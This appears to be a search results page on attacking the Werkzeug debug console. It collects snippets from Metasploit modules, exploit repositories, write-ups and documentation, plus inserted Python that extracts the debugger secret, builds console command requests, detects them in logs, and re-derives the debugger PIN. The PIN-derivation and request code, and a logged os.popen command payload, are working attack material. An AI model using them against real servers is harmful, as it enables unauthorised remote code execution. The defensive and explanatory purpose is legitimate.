🌐
GitHub
github.com › rapid7 › metasploit-framework › blob › master › modules › exploits › multi › http › werkzeug_debug_rce.rb
metasploit-framework/modules/exploits/multi/http/werkzeug_debug_rce.rb at master · rapid7/metasploit-framework
fail_with(Failure::UnexpectedReply, 'Werkzeug "Secret" could not be retrieved') unless (match = secret_and_frame) vprint_status "Secret Code: #{match[:secret]}"
Author   rapid7
🌐
InfosecMatter
infosecmatter.com › home › metasploit module library
Werkzeug Debug Shell Command Execution - Metasploit - InfosecMatter
December 4, 2022 - '__debugger__' => 'yes', 'cmd' => payload.encoded, 'frm' => '0', 's' => secret } ) else print_error('Secret code not detected.') end end end
🌐
Netscylla
netscylla.com › blog › 2018 › 10 › 03 › werkzeug-debugger.html
Werkzeug Debugger | Netscylla’s Blog
October 3, 2018 - You can inject code directly into the application, exposing all data on the server that the application has access to. Both the Werkzeug and the Flask documentation say in large bold letters that you should not expose this debugger online. Now, Werkzeug requires an actual error to trigger the console, as it uses a secret key generated when the application starts, which is only exposed in the Werkzeug Debugger page.
🌐
GitHub
github.com › am0nsec › exploit › blob › master › python › werkzeug-debug-console › exploit.py
exploit/python/werkzeug-debug-console/exploit.py at master · am0nsec/exploit
if resp.status_code != 200: print(error_message('Ouups something goes wrong')) sys.exit(1) · if 'Werkzeug powered traceback interpreter' not in resp.text: print(error_message('Werkzeug console not found!')) sys.exit(1) print(success_message('Werkzeug console successfully found!')) · if 'SECRET' not in resp.text: print(error_message('Secret key not found!')) sys.exit(1) secret = re.findall("SECRET = \"([^']{20})", resp.text)[0] print(info_message('Secret Code: {}\n'.format(secret))) ·
Author   am0nsec
🌐
Tumblr
detectifylabs.tumblr.com › post › 130332638391 › how-patreon-got-hacked-publicly-exposed-werkzeug
How Patreon got hacked – Publicly exposed Werkzeug Debugger
October 2, 2015 - Now, Werkzeug requires an actual error to trigger the console, as it uses a secret key generated when the application starts, which is only exposed in the Werkzeug Debugger page. Without this secret key you cannot run any commands; that's why you need an exception to reveal the secret. Also worth noting is that the debugger only accepts commands sent in as GET parameters, which then show up in access logs on the vulnerable host, which is great for forensic analysis and investigation. Also, each line in the traceback corresponds to a frame, which the debugger also needs in order to know exactly where in the code to run the command.
🌐
Werkzeug
werkzeug.palletsprojects.com › en › stable › debug
Debugging Applications — Werkzeug Documentation (3.1.x)
Most such environments are production servers, where the debugger should not be enabled anyway. Enable the debugger by wrapping the application with the DebuggedApplication middleware. Alternatively, you can pass use_debugger=True to run_simple() and it will do that for you. class werkzeug.debug.DebuggedApplication(app, evalex=False, request_key='werkzeug.request', console_path='/console', console_init_func=None, show_hidden_frames=False, pin_security=True, pin_logging=True)¶
🌐
GitHub
github.com › wdahlenburg › werkzeug-debug-console-bypass
GitHub - wdahlenburg/werkzeug-debug-console-bypass: Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. · GitHub
🌐
Exploit-DB
exploit-db.com › raw › 37814
Exploit-db
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit4 · secret } ) else print_error('Secret code not detected.') end end end
🌐
Vulners
vulners.com › zdt › werkzeug debug shell command execution exploit
Werkzeug Debug Shell Command Execution Exploit - exploit database | Vulners.com
August 17, 2015 - Werkzeug Debug Shell Command Execution Exploit This module exploits the Werkzeug debug console to put down a Python shell. It is tested against 0.9.6 on Debian, 0.9.6 on Centos, and 0.10 on Debian.
🌐
Medium
software-sinner.medium.com › cyberseclabs-debug-4efd08e42d5a
CyberSecLabs-Debug. This is my sixth write up and I will be… | by Software Sinner | Medium
July 20, 2020 - An RCE exploit is discovered with the Werkzeug Debugger, giving us user. A SUID file is then leveraged with xxd to grab the shadow file and break it with John the Ripper. I started off with two Nmap scans on this machine and stuck with the results from the first scan. My first scan used default scripts -sC and version detection -sV.
🌐
Exploit-DB
exploit-db.com › exploits › 37814
Werkzeug - Debug Shell Command Execution (Metasploit) - Python remote Exploit
August 18, 2015 - Tested against: 0.9.6 on Debian 0.9.6 on Centos 0.10 on Debian }, 'Author' => 'h00die <mike[at]shorebreaksecurity.com>', 'References' => [ ['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger'] ], 'License' => MSF_LICENSE, 'Platform' => ['python'], 'Targets' => [[ 'werkzeug 0.10 and older', {}]], 'Arch' => ARCH_PYTHON, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 28 2015' )) register_options( [ OptString.new('TARGETURI', [true, 'URI to the console', '/console']) ], self.class ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(datastore['TAR
🌐
Beautiful Soup
tedboy.github.io › flask › _modules › werkzeug › debug.html
Source code for werkzeug.debug - Flask API
""" def __init__(self, namespace): self.console = Console(namespace) self.id = 0 def get_pin_and_cookie_name(app): """Given an application object this returns a semi-stable 9 digit pin code and a random key. The hope is that this is stable between restarts to not make debugging particularly frustrating. If the pin was forcefully disabled this returns `None`. Second item in the resulting tuple is the cookie name for remembering. """ pin = os.environ.get('WERKZEUG_DEBUG_PIN') rv = None num = None # Pin was explicitly disabled if pin == 'off': return None, None # Pin was provided explicitly if pi
🌐
Greg Scharf
blog.gregscharf.com › 2023 › 04 › 09 › lfi-to-rce-in-flask-werkzeug-application
LFI to RCE in Flask Werkzeug Application :: Greg Scharf — Development & Security
April 10, 2023 - First, look for SSTI (server-side template injection) since Flask uses the Jinja2 templating engine. Second, check if the secret key used to sign session cookies is visible anywhere in the source code.
🌐
Bengrewell
bengrewell.com › cracking-flask-werkzeug-console-pin
Cracking Werkzeug Debugger Console Pin
March 11, 2023 - Then you will want to edit the Werkzeug debugger code that generates the pin to output the values of interest. You can edit it by opening venv/lib/python3.11/site-packages/werkzeug/debug/__init__.py in your editor of choice. Then you'll want to scroll down to the line that constructs the private_bits and add the print statements shown below. # This information only exists to make the cookie unique on the # computer, not as a security feature.
🌐
Werkzeug
werkzeug.palletsprojects.com › en › stable › changes
Changes — Werkzeug Documentation (3.1.x)
May 11, 2021 - Corrected an issue that caused the debugger not to use the machine GUID on POSIX systems. Corrected a Unicode error on Python 3 for the debugger’s PIN usage. Corrected the timestamp verification in the pin debug code. Without this fix the pin was remembered for too long. Released on April 15th 2016. fixed a problem with the machine GUID detection code on OS X on Python 3. Released on April 14th 2016. ... Released on April 14th 2016. werkzeug...
🌐
Medium
medium.com › @netscylla › werkzeug-debugger-3e4830cc0129
Werkzeug Debugger. One of the most popular WSGI utility… | by Netscylla Cyber Security | Medium
November 21, 2018 - Without this secret key you cannot run any commands; that's why you need an exception to reveal the secret. Also worth noting is that the debugger only accepts commands sent in as GET parameters, which then show up in access logs on the vulnerable host, which is great for forensic analysis and investigation. Also, each line in the traceback corresponds to a frame, which the debugger also needs in order to know exactly where in the code to run the command. ... Important: Werkzeug 0.11+ requires knowledge of a PIN; after several unsuccessful attempts the debugger will shut down.
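The request format the Detectify and Netscylla posts describe (secret scraped from a traceback page, then `__debugger__=yes`, `cmd`, `frm` and `s` sent as GET parameters), as an added example that is not code from either post, from the Metasploit module or from Werkzeug itself. It also shows the defender's side those posts hint at: because the command rides in the query string, console use is recoverable from the access log. The traceback HTML, the SECRET value, the IPs and the log lines are all constructed placeholders.

```python
import re
import urllib.parse

# Constructed fragment of a Werkzeug traceback page (not captured from a real
# host). The debugger's page script embeds the 20-character SECRET that every
# console request must send back in the `s` parameter; traceback frames appear
# as elements with `frame-<id>` ids.
SAMPLE_TRACEBACK_HTML = """
<script>
  var CONSOLE_MODE = false,
      EVALEX = true,
      SECRET = "Ab1Cd2Ef3Gh4Ij5Kl6Mn";
</script>
<div class="frame" id="frame-139700000000">...</div>
"""

SECRET_RE = re.compile(r'SECRET\s*=\s*"([A-Za-z0-9]{20})"')
FRAME_RE = re.compile(r'id="frame-(\d+)"')
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def extract_secret(html):
    """Return the SECRET from a debugger page, or None when the page has none
    (a plain 500 page with the debugger off, for instance)."""
    m = SECRET_RE.search(html)
    return m.group(1) if m else None


def extract_frames(html):
    """Return the traceback frame ids; a command can target any of them."""
    return [int(x) for x in FRAME_RE.findall(html)]


def build_console_query(cmd, secret, frame=0):
    """Query string the console expects: frm=0 runs the command in the console's
    own namespace, a frame id from the traceback runs it in that frame's locals."""
    return urllib.parse.urlencode(
        {"__debugger__": "yes", "cmd": cmd, "frm": str(frame), "s": secret}
    )


# Constructed access-log lines (combined log format). The second and third show
# what console usage looks like to a defender: the command and the PIN attempt
# travel as GET parameters and are logged verbatim.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [02/Oct/2015:10:00:01 +0000] "GET /api/items HTTP/1.1" 200 512
10.0.0.9 - - [02/Oct/2015:10:00:07 +0000] "GET /console?__debugger__=yes&cmd=__import__%28%27os%27%29.popen%28%27id%27%29.read%28%29&frm=0&s=Ab1Cd2Ef3Gh4Ij5Kl6Mn HTTP/1.1" 200 77
10.0.0.9 - - [02/Oct/2015:10:00:09 +0000] "GET /console?__debugger__=yes&cmd=pinauth&pin=123-456-789&s=Ab1Cd2Ef3Gh4Ij5Kl6Mn HTTP/1.1" 200 40
"""


def find_debugger_requests(log_text):
    """Return (client_ip, decoded cmd) for every request that talks to the
    debugger. Matching on the __debugger__=yes marker plus a cmd parameter,
    rather than on the /console path, also catches console use against the URL
    of a page whose traceback was triggered."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        qs = urllib.parse.parse_qs(urllib.parse.urlsplit(m.group(1)).query)
        if qs.get("__debugger__") == ["yes"] and "cmd" in qs:
            hits.append((line.split()[0], qs["cmd"][0]))
    return hits


if __name__ == "__main__":
    secret = extract_secret(SAMPLE_TRACEBACK_HTML)
    print("secret:", secret, "frames:", extract_frames(SAMPLE_TRACEBACK_HTML))
    print("GET /console?" + build_console_query("print(1)", secret))
    for ip, cmd in find_debugger_requests(SAMPLE_ACCESS_LOG):
        print(ip, "->", cmd)
```

On a 0.11+ target the same request shape is used, but the console answers with the PIN prompt until a `cmd=pinauth&pin=...` request succeeds, so the log detector above also surfaces PIN guessing.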
🌐
GitHub
github.com › grav3m1nd-byte › werkzeug-pin
GitHub - grav3m1nd-byte/werkzeug-pin: Yet another Werkzeug Console Pin Exploit Explanation · GitHub
These exploits were developed after reviewing Werkzeug source code repo to better understand how the code is generated to then reverse it. The following is the function that generates the pin in Werkzeug from __init__.py. def get_pin_and_cookie_name(app): pin = os.environ.get('WERKZEUG_DEBUG_PIN') rv = None num = None # Pin was explicitly disabled if pin == 'off': return None, None # Pin was provided explicitly if pin is not None and pin.replace('-', '').isdigit(): # If there are separators in the pin, return it directly if '-' in pin: rv = pin else: num = pin modname = getattr(app, '__module__', getattr(app.__class__, '__module__')) try: # `getpass.getuser()` imports the `pwd` module, # which does not exist in the Google App Engine sandbox.
Author   grav3m1nd-byte
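The PIN derivation that the wdahlenburg, bengrewell and grav3m1nd-byte entries above all reverse, as an added example that is not code from any of those repositories or from Werkzeug. It re-derives the PIN and cookie name from the bits `get_pin_and_cookie_name()` hashes, which is why a file-read bug is enough: the "public" bits (username, module name, app class name, module path) and the "private" bits (MAC address as a decimal string, machine id plus cgroup suffix) are all readable from `/proc`, `/sys` and `/etc`. The sample username, paths, MAC, machine id and container id are placeholders; current Werkzeug hashes with SHA-1 and older releases used MD5, so which one a given target uses is an assumption to check against its installed source.

```python
import hashlib
from itertools import chain


def mac_to_decimal(mac):
    """uuid.getnode() yields the MAC as an integer and Werkzeug hashes str() of
    it, so '02:42:ac:11:00:02' (e.g. from /sys/class/net/eth0/address) becomes
    the decimal string of 0x0242ac110002."""
    return str(int(mac.replace(":", ""), 16))


def linux_machine_id(machine_id_file, cgroup_first_line):
    """Mirror get_machine_id() on Linux: first line of /etc/machine-id (boot_id
    as fallback) plus the last path component of the first /proc/self/cgroup
    line, which inside Docker is the container id. Both inputs are bytes."""
    return machine_id_file.strip() + cgroup_first_line.strip().rpartition(b"/")[2]


def derive_pin_and_cookie(public_bits, private_bits, hash_name="sha1"):
    """Re-derive PIN and cookie name from the hashed bits: every non-empty bit
    in order, then b"cookiesalt" for the cookie, then b"pinsalt" for the PIN.
    hash_name is "sha1" for current Werkzeug, "md5" for older releases."""
    h = hashlib.new(hash_name)
    for bit in chain(public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")
    cookie_name = "__wzd" + h.hexdigest()[:20]
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]
    # 9 digits only divide by 3, so the result is always ddd-ddd-ddd.
    for group_size in (5, 4, 3):
        if len(num) % group_size == 0:
            pin = "-".join(
                num[i:i + group_size].rjust(group_size, "0")
                for i in range(0, len(num), group_size)
            )
            break
    else:
        pin = num
    return pin, cookie_name


def pin_is_well_formed(pin):
    """Sanity check on the derived PIN's shape (three groups of three digits)."""
    return len(pin) == 11 and pin[3] == pin[7] == "-" and pin.replace("-", "").isdigit()


# Constructed inputs standing in for what a file read against a Flask app in a
# container would return; every value is a placeholder.
PUBLIC_BITS = [
    "www-data",                                              # getpass.getuser()
    "flask.app",                                             # app.__module__
    "Flask",                                                 # app class name
    "/usr/local/lib/python3.11/site-packages/flask/app.py",  # module __file__
]
PRIVATE_BITS = [
    mac_to_decimal("02:42:ac:11:00:02"),
    linux_machine_id(
        b"0123456789abcdef0123456789abcdef\n",
        b"0::/docker/6f3b0c1d2e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b\n",
    ),
]

if __name__ == "__main__":
    for algo in ("sha1", "md5"):
        pin, cookie = derive_pin_and_cookie(PUBLIC_BITS, PRIVATE_BITS, algo)
        print(f"{algo}: pin={pin} cookie={cookie}")
```

Note that the grouping loop and the salts are what make this stable across restarts, which is exactly the property an attacker relies on: once the bits are recovered, the PIN does not change until the machine id, MAC or module path does.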
🌐
GitHub
github.com › pallets › werkzeug › issues › 2916
Race condition in debugger PIN authentication · Issue #2916 · pallets/werkzeug
June 21, 2024 - This happens because DebuggedApplication.pin_auth() does not properly handle parallel PIN authentication requests. The app code: import flask app = flask.Flask(__name__) app.debug = True app.run() Program that reproduces the bug (assuming the app above is running on localhost:5000): from threading import Thread from requests import get threads_up = 0 threads_to_start = 150 host = 'http://localhost:5000' response = get(f"{host}/console") secret = response.text.split('SECRET = "')[1] secret = secret.split('"')[0] print("Secret:", secret) wait = True not_exhausted = 0 def send_code(pin): # wait f
Author   unknown-1-0